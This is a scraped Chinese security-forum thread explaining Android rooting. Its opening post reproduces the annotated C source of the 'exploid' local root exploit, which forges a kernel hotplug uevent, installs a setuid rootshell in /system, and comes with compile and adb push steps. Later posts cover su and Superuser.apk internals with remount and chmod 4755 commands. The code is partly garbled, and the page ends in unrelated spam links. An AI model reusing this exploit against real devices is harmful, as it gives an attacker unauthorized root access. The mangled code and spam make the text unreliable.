发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
免责声明:吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。
( 京ICP备号 | 京公网安备 87号 )
Powered by Discuz! X3.2
Comsenz Inc.查看: 7896|回复: 13
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
本帖最后由 H.U.C_泉泉 于
21:56 编辑
linux系统由udev提供系统设备的管理,比如提供热拔插usb设备等等。而Android把udev的工作移交给init进程。而linux中版本号小于1.4.1的udev不会检查是由内核还是用户发送热拔插信息。因此用户可以发送恶意的信息让内核加载定义的恶意程序从而取得root权限。该代码如下。
程序执行的顺序用(1)序号标明了。
通过在 下载编译工具
通过arm-none-eabi-gcc exploid.c -static -o exploid 编译
adb push exploid /data/local/tmp 目录中执行即可root
Android local root exploid (C) The Android Exploid Crew
[+] Using basedir=/data/local/tmp, path=/data/local/tmp/exploid_test
[+] opening NETLINK_KOBJECT_UEVENT socket
Try to invoke hotplug now, clicking at the wireless
settings, plugin USB key etc.
You succeeded if you find /system/bin/rootshell.
GUI might hang/restart meanwhile so be patient.#include &stdio.h&
#include &sys/socket.h&
#include &sys/types.h&
#include &linux/netlink.h&
#include &fcntl.h&
#include &errno.h&
#include &stdlib.h&
#include &string.h&
#include &unistd.h&
#include &sys/stat.h&
#include &signal.h&
#include &sys/mount.h&
int main(int argc, char **argv, char **env)
{
        char buf[512], path[512];
        
        struct sockaddr_
        struct iovec iov = {buf, sizeof(buf)};
        //(1)初始化要发送的数据,通过NET_LINK机制(参见man 手册,可以与内核实现近似于套接字的通信方式)发送
        struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
        
        char *basedir = NULL;
        /* I hope there is no LD_ bug in androids rtld :) */
        //(11)root后执行rootshell则执行该步,直接创建一个有root权限的shell
        if (geteuid() == 0 && getuid() != 0)
                rootshell(env);
    //(2)获取程序的路径,为/data/local/tmp/exploid
        if (readlink(&/proc/self/exe&, path, sizeof(path)) & 0)
                die(&[-] readlink&);
        if (geteuid() == 0) {
        //(9)有内核加载热拔插固件时再次执行该应用,此时有效id为为0,有root权限
                clear_hotplug();
                /* remount /system rw */
               
                //(10)拷贝自己到/system/bin/目录下成为rootshell,并改变sh的文件属性
                remount_system(&/system&);
                if (copy(path, &/system/bin/rootshell&) != 0)
                        chmod(&/system/bin/sh&, 04755);
                else
                        chmod(&/system/bin/rootshell&, 04711);
                for (;;)
                        sleep(3);
        }
        printf(&[*] Android local root exploid (C) The Android Exploid Crew\n&);
    //(3)改变工作目录,没有root权限,只可以在少数目录执行
        basedir = &/sqlite_stmt_journals&;
        if (chdir(basedir) & 0) {
                basedir = &/data/local/tmp&;
                if (chdir(basedir) & 0)
                        basedir = strdup(getcwd(buf, sizeof(buf)));
        }
        printf(&[+] Using basedir=%s, path=%s\n&, basedir, path);
        printf(&[+] opening NETLINK_KOBJECT_UEVENT socket\n&);
        memset(&snl, 0, sizeof(snl));
        snl.nl_pid = 1;
        snl.nl_family = AF_NETLINK;
        
    //(4)构建一个NETLINK的套接字
        if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) & 0)
                die(&[-] socket&);
    //(5)创建要热拔插的文件,其中hotplug文件中存储的为/data/local/tmp/exploid
        close(creat(&loading&, 0666));
        if ((ofd = creat(&hotplug&, 0644)) & 0)
                die(&[-] creat&);
        if (write(ofd, path , strlen(path)) & 0)
                die(&[-] write&);
        close(ofd);
        
        //(6)建立一个data文件,为指向系统的hotplug的符号链接
        symlink(&/proc/sys/kernel/hotplug&, &data&);
        
        //(7)构建发送给内核的信息,内容为进行热拔插,固件位置在/data/local/tmp/hotplug
        snprintf(buf, sizeof(buf), &ACTION=add%cDEVPATH=/..%s%c&
                 &SUBSYSTEM=firmware%c&
                 &FIRMWARE=../../..%s/hotplug%c&, 0, basedir, 0, 0, basedir, 0);
        printf(&[+] sending add message ...\n&);
        
        //(8)发送该信息
        if (sendmsg(sock, &msg, 0) & 0)
                die(&[-] sendmsg&);
        close(sock);
        printf(&[*] Try to invoke hotplug now, clicking at the wireless\n&
               &[*] settings, plugin USB key etc.\n&
               &[*] You succeeded if you find /system/bin/rootshell.\n&
               &[*] GUI might hang/restart meanwhile so be patient.\n&);
        sleep(3);
        return 0;
}
void die(const char *msg)
{
        perror(msg);
        exit(errno);
}
int copy(const char *from, const char *to)
{
        int fd1, fd2;
        char buf[0x1000];
        int r = 0;
        if ((fd1 = open(from, O_RDONLY)) & 0)
                return -1;
        if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) & 0) {
                close(fd1);
                return -1;
        }
        for (;;) {
                r = read(fd1, buf, sizeof(buf));
                if (r &= 0)
                        
                if (write(fd2, buf, r) != r)
                        
        }
        close(fd1);
        close(fd2);
        sync(); sync();
        
}
void clear_hotplug()
{
 复制代码
&强烈要求发教程&
<p id="rate_844" onmouseover="showTip(this)" tip="我很赞同&威望 + 5
" class="mtn mbn">
<p id="rate_465" onmouseover="showTip(this)" tip="&威望 + 5
" class="mtn mbn">
<p id="rate_653" onmouseover="showTip(this)" tip="泉泉对这方面真是很有研究啊,支持!&金钱 + 5
" class="mtn mbn">
<p id="rate_899" onmouseover="showTip(this)" tip="学习&金钱 + 1
" class="mtn mbn">
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识。
二、 Root 的介绍
1. Root 的目的
可以让我们拥有掌控手机系统的权限,比如删除一些system/app下面的无用软件,更换开关机铃声和动画,拦截状态栏弹出的广告等。
2. Root的原理介绍
谷歌的android系统管理员用户就叫做root,该帐户拥有整个系统至高无上的权利,它可以访问和修改你手机几乎所有的文件,只有root才具备最高级别的管理权限。我们root手机的过程也就是获得手机最高使用权限的过程。同时为了防止不良软件也取得root用户的权限,当我们在root的过程中,还会给系统装一个程序,用来作为运行提示,由用户来决定,是否给予最高权限。这个程序的名字叫做Superuser.apk。当某些程序执行su指令想取得系统最高权限的时候,Superuser就会自动启动,拦截该动作并作出询问,当用户认为该程序可以安全使用的时候,那么我们就选择允许,否则,可以禁止该程序继续取得最高权限。Root的过程其实就是把su文件放到/system/bin/ Superuser.apk 放到system/app下面,还需要设置/system/bin/su可以让任意用户可运行,有set uid和set gid的权限。即要在android机器上运行命令:adb shell chmod 4755 /system/bin/su。而通常,厂商是不会允许我们随便这么去做的,我们就需要利用操作系统的各种漏洞,来完成这个过程。
特别说明:我们烧机中的Eng版本并没有Root权限
3. Root的方法
从Root的原理我们了解到,root 过程分三步:
a. adb push su /system/bin
b. adb push SuperUser.apk /system/app
c. adb shell chmod 4755 /system/bin/su
若系统是eng版的,做到以上三步,那么我们Root就大功告成,但实际是不行的。为什么呢?原因有三:
1、user版的/system路径是只读权限,不能简单写入
2、 chmod需要Root权才能运行(死循环了)
3、有些系统在启动时会自动将su的4755权限设成755,甚至直接删除su
那么针对这种情况,我们怎么办呢?非常简单:烧一个eng版本的boot.img就行了
可以用展讯的烧录工具,或者用fastboot模式从sd卡烧一个boot.img文件即可
至此,我们Root就成功了,可以用R.E(Root Explorer)在根目录创建和删除文件。
三、 深入理解Root机制
其流程是:
1. Su 被用户调用
2. Su 创建了一个socket监听
3. Su 向Superuser发送了一个广播,说是有一个程序要请求root
4. Su 等待socket 数据接收。有超时处理。
5. Superuser 界面收到广播后,弹出一个对话框,询问用户
6. Superuser 向传来的数据中的socket写回用户应答结果。
7. Su 根据socket得到的结果处理应该不应该继续执行
8. 完成提权管理
superuser.apk这个程序是root成功后,专门用来管理root权限使用的,防止被恶意程序滥用。
源码地址:
我们有两点疑问:
1. superuser是怎么知道谁想用root权限?
2. superuser是如何把用户的选择告诉su程序的?
即superuser和su程序是如何通讯的,他们俩位于不通的时空,一个在java虚拟中,一个在linux的真实进程中。
superuser共有两个activity: SuperuserActivity 和 SuperuserRequestActivity ,其中SuperuserActivity 主要是用来管理白名单的,就是记住哪个程序已经被允许使用root权限了,省的每次用时都问用户。
SuperuserRequestActivity 就是用来询问用户目前有个程序想使用root权限,是否允许,是否一直允许,即放入白名单。
这个白名单比较关键,是一个sqlite数据库文件,位置:
/data/data/com.koushikdutta.superuser/databases/superuser.sqlite
上文说过,root的本质就是往 /system/bin/ 下放一个su文件,不检查调用者权限的su文件。普通程序可以调用该su来运行root权限的命令。superuser.apk中就自带了一个这样的su程序。一开始superuser会检测/system/bin/su是否存在:
File su = new File(&/system/bin/su&);
// 检测su文件是否存在,如果不存在则直接返回
if (!su.exists()) {
Toast toast = Toast.makeText(this, &Unable to find /system/bin/su.&, Toast.LENGTH_LONG);
toast.show();
//如果大小一样,则认为su文件正确,直接返回了事。
if (su.length() == suStream.available())
suStream.close();
// 如果检测到/system/bin/su 文件存在,但是不对头,则把自带的su先写到&/data/data/com.koushikdutta.superuser/su&
//再写到/system/bin/su。
byte[] bytes = new byte[suStream.available()];
DataInputStream dis = new DataInputStream(suStream);
dis.readFully(bytes);
FileOutputStream suOutStream = new FileOutputStream(&/data/data/com.koushikdutta.superuser/su&);
suOutStream.write(bytes);
suOutStream.close();
Process process = Runtime.getRuntime().exec(&su&);
DataOutputStream os = new DataOutputStream(process.getOutputStream());
os.writeBytes(&mount -oremount,rw /dev/block/mtdblock3 /system\n&);
os.writeBytes(&busybox cp /data/data/com.koushikdutta.superuser/su /system/bin/su\n&);
os.writeBytes(&busybox chown 0:0 /system/bin/su\n&);
os.writeBytes(&chmod 4755 /system/bin/su\n&);
os.writeBytes(&exit\n&);
os.flush();
有进程使用root权限,superuser是怎么知道的呢,关键是句:
sprintf(sysCmd, &am start -a android.intent.action.MAIN
-n com.koushikdutta.superuser/com.koushikdutta.superuser.SuperuserRequestActivity
--ei uid %d --ei pid %d & /dev/null&, g_puid, ppid);
if (system(sysCmd))
return executionFailure(&am.&);
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
   原理是am命令,am的用法:  usage: am [subcommand] [options]
    start an Activity: am start [-D] [-W] &INTENT&
        -D: enable debugging
        -W: wait for launch to complete
    start a Service: am startservice &INTENT&
    send a broadcast Intent: am broadcast &INTENT&
    start an Instrumentation: am instrument [flags] &COMPONENT&
        -r: print raw results (otherwise decode REPORT_KEY_STREAMRESULT)
        -e &NAME& &VALUE&: set argument &NAME& to &VALUE&
        -p &FILE&: write profiling data to &FILE&
        -w: wait for instrumentation to finish before returning
    start profiling: am profile &PROCESS& start &FILE&
    stop profiling: am profile &PROCESS& stop
    &INTENT& specifications include these flags:
        [-a &ACTION&] [-d &DATA_URI&] [-t &MIME_TYPE&]
        [-c &CATEGORY& [-c &CATEGORY&] ...]
        [-e|--es &EXTRA_KEY& &EXTRA_STRING_VALUE& ...]
        [--esn &EXTRA_KEY& ...]
        [--ez &EXTRA_KEY& &EXTRA_BOOLEAN_VALUE& ...]
        [-e|--ei &EXTRA_KEY& &EXTRA_INT_VALUE& ...]
        [-n &COMPONENT&] [-f &FLAGS&]
        [--grant-read-uri-permission] [--grant-write-uri-permission]
        [--debug-log-resolution]
        [--activity-brought-to-front] [--activity-clear-top]
        [--activity-clear-when-task-reset] [--activity-exclude-from-recents]
        [--activity-launched-from-history] [--activity-multiple-task]
        [--activity-no-animation] [--activity-no-history]
        [--activity-no-user-action] [--activity-previous-is-top]
        [--activity-reorder-to-front] [--activity-reset-task-if-needed]
        [--activity-single-top]
        [--receiver-registered-only] [--receiver-replace-pending]
        [&URI&]复制代码
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
还有个疑点,就是su怎么知道用户是允许root权限还是反对呢?原来是上面提到的白名单起来作用,superuser把用户的选择放入:
/data/data/com.koushikdutta.superuser/databases/superuser.sqlite    数据库中,然后su进程再去读该数据库来判断是否允许。
四、 资源文件的获取
从上文的源码地址获取源代码,替换系统的system/extras/su/下面的su.c 和Android.mk文件,使用编译命令 ./mk td28 u adr system/extras/su/ 编译成功后会生成out/target/product/hsdroid/system/xbin/su 文件,而Superuser.apk就是普通的apk文件,都在源码地址里面可以下载,下载后倒入到eclipse即可直接运行。
在阅读完本文后,可以站在专业的角度了解root的真正原理,以及有用户有需求时我们可以帮助其快速的解决问题。
最近比较忙,不会常在。
UID356456注册时间最后登录在线时间33 小时阅读权限20积分129精华0
红盟菜鸟, 积分 129, 距离下一级还需 21 积分
TA的每日心情擦汗 15:07:11签到天数: 94 天[LV.6]常住居民II金钱727 UID356456注册时间最后登录在线时间33 小时阅读权限20积分129精华0
做一下沙发,不懂。。。。谢谢楼主
UID393027注册时间最后登录在线时间78 小时阅读权限20积分121精华0
红盟菜鸟, 积分 121, 距离下一级还需 29 积分
TA的每日心情衰 12:19:22签到天数: 50 天[LV.5]常住居民I金钱460 UID393027注册时间最后登录在线时间78 小时阅读权限20积分121精华0
吾的手机不是安卓的说…
犯我中华龙威者必诛之
UID368965注册时间最后登录在线时间476 小时阅读权限70积分3195精华0
红盟先锋, 积分 3195, 距离下一级还需 805 积分
TA的每日心情奋斗昨天&20:10签到天数: 716 天[LV.9]以坛为家II金钱7685 UID368965注册时间最后登录在线时间476 小时阅读权限70积分3195精华0
还是不懂怎么root。。。
UID367465注册时间最后登录在线时间151 小时阅读权限50积分822精华0
红盟成员, 积分 822, 距离下一级还需 1178 积分
TA的每日心情奋斗 17:05:38签到天数: 76 天[LV.6]常住居民II金钱1465 UID367465注册时间最后登录在线时间151 小时阅读权限50积分822精华0
我想说,真的看不懂啊!不过了解一下还好
道,可道,非常道;名,可名,非常名。
UID391431注册时间最后登录在线时间31 小时阅读权限30积分161精华0
红盟学员, 积分 161, 距离下一级还需 539 积分
TA的每日心情开心 22:18:59签到天数: 62 天[LV.6]常住居民II金钱575 UID391431注册时间最后登录在线时间31 小时阅读权限30积分161精华0
眼花了。。。放假回家慢慢研究。。谢谢lz分享
UID136746注册时间最后登录在线时间201 小时阅读权限50积分928精华0
红盟成员, 积分 928, 距离下一级还需 1072 积分
TA的每日心情开心 17:25:53签到天数: 212 天[LV.7]常住居民III金钱2262 UID136746注册时间最后登录在线时间201 小时阅读权限50积分928精华0
我这个人吧,最没耐心。额
complicated
UID302624注册时间最后登录在线时间84 小时阅读权限50积分803精华0
红盟成员, 积分 803, 距离下一级还需 1197 积分
TA的每日心情怒 18:23:16签到天数: 197 天[LV.7]常住居民III金钱2221 UID302624注册时间最后登录在线时间84 小时阅读权限50积分803精华0
还是看视屏+教程实在&&你这样的我都晕了
做一名正直的红客
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
正在准备着。。先凑合吧
最近比较忙,不会常在。
UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
红盟学员, 积分 298, 距离下一级还需 402 积分
TA的每日心情无聊 18:06:41签到天数: 135 天[LV.7]常住居民III金钱1441 UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
360一键root这些应该也是有Superuser.apk这个程序原理的吧,Eng版本是什么?手机把语言换成英文?
UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
红盟学员, 积分 298, 距离下一级还需 402 积分
TA的每日心情无聊 18:06:41签到天数: 135 天[LV.7]常住居民III金钱1441 UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
如11楼说的,如果做出视频真人语音解说的话,表示热烈欢迎,楼主辛苦了!
全体成员请点此查看详细内容
Powered by}
我要回帖
更多关于 游改乐 v3.5.6 注册码 的文章
更多推荐
- ·新疆戈壁滩在哪里是什么地貌
- ·活佛和泥巴是到底什么是活佛生肖
- ·无限法则需要电脑上免费的加速器器吗
- ·千年活佛身上有什么特征【千年活佛身上有什么特征出身】
- ·按要求编写C语言编程软件程序
- ·北京赛车机器人赛车主帐号总掉线是怎么回事
- ·全民k歌id在哪里看周榜在哪里看
- ·我的世界超能力者mod最新超能力mod
- ·我开了一个MineCraft服务器安全威胁,被人威胁了怎么办?
- ·dnf战法炫纹聚合和炫纹进化 炫纹聚合冲突吗
- ·乐视2怎么用gba模拟器1.72中文版
- ·英雄联盟开始不了游戏游戏开始有杂音
- ·C7JRNJKZHRYF这个coreldraw x4 序列码码手机是真是假,谁帮忙查询一下
- ·微聊手机充值卡卡充值jj游戏
- ·康佳v870怎么用康佳手机刷机包?
- ·拉不上网线,一个手机一个笔记本,偶尔打打游戏看看电影,没有无线网,最实惠的笔记本电脑方法是什么?求大神解答。
- ·格力r32制冷剂优点空调可以用快速接头接管吗
- ·联想乐檬x3解锁指纹解锁后不能进入桌面
- ·我捡到的6s能刷机解锁吗了一个苹果6s刷机后,不知道ID密码,
- ·柬埔寨回应美国制裁过境税:朋友从美国寄了两部手机,一部是苹果6s,一部是黑莓,还寄了大约一万美元和一些黄金首饰
- ·安卓游改乐注册码大全编辑源码获取root失败怎么解决?
- ·暖气配送与空调开暖气耗电吗专业的学生如何就业
- ·三星手机刷机刷不进去reconvwry可以进去,怎么刷机
- ·有一款声擎B1的网线传输距离离有多少?
- ·如果手机不能联网络,也网络被限制不能玩lol手机该怎么办?还有怎么能让手机可以继
- ·收一台 二手 苹果ID锁的 手机要求苹果6以上的 有的加我好友二手车
- ·有没有守望先锋助手手机上的助手,类似LOL的盒子
- ·现代王牌蓝牙低音炮音箱带一蓝牙但是蓝牙下面的小洞干用的
- ·光华口腔微信几点放号手机号二次放号怎么办?
- ·我金立f103原厂卡刷包怎么运内只有200mb
- ·大金洗衣机e4大金空调故障代码a3表
- ·one0pp0r7plus现在多少钱3是什么是不是曲屏
- ·魅族彩信已读报告noet3拦截的彩信怎么看
- ·手机帐号申诉如何才能申诉qq空间百分百成功功在线等
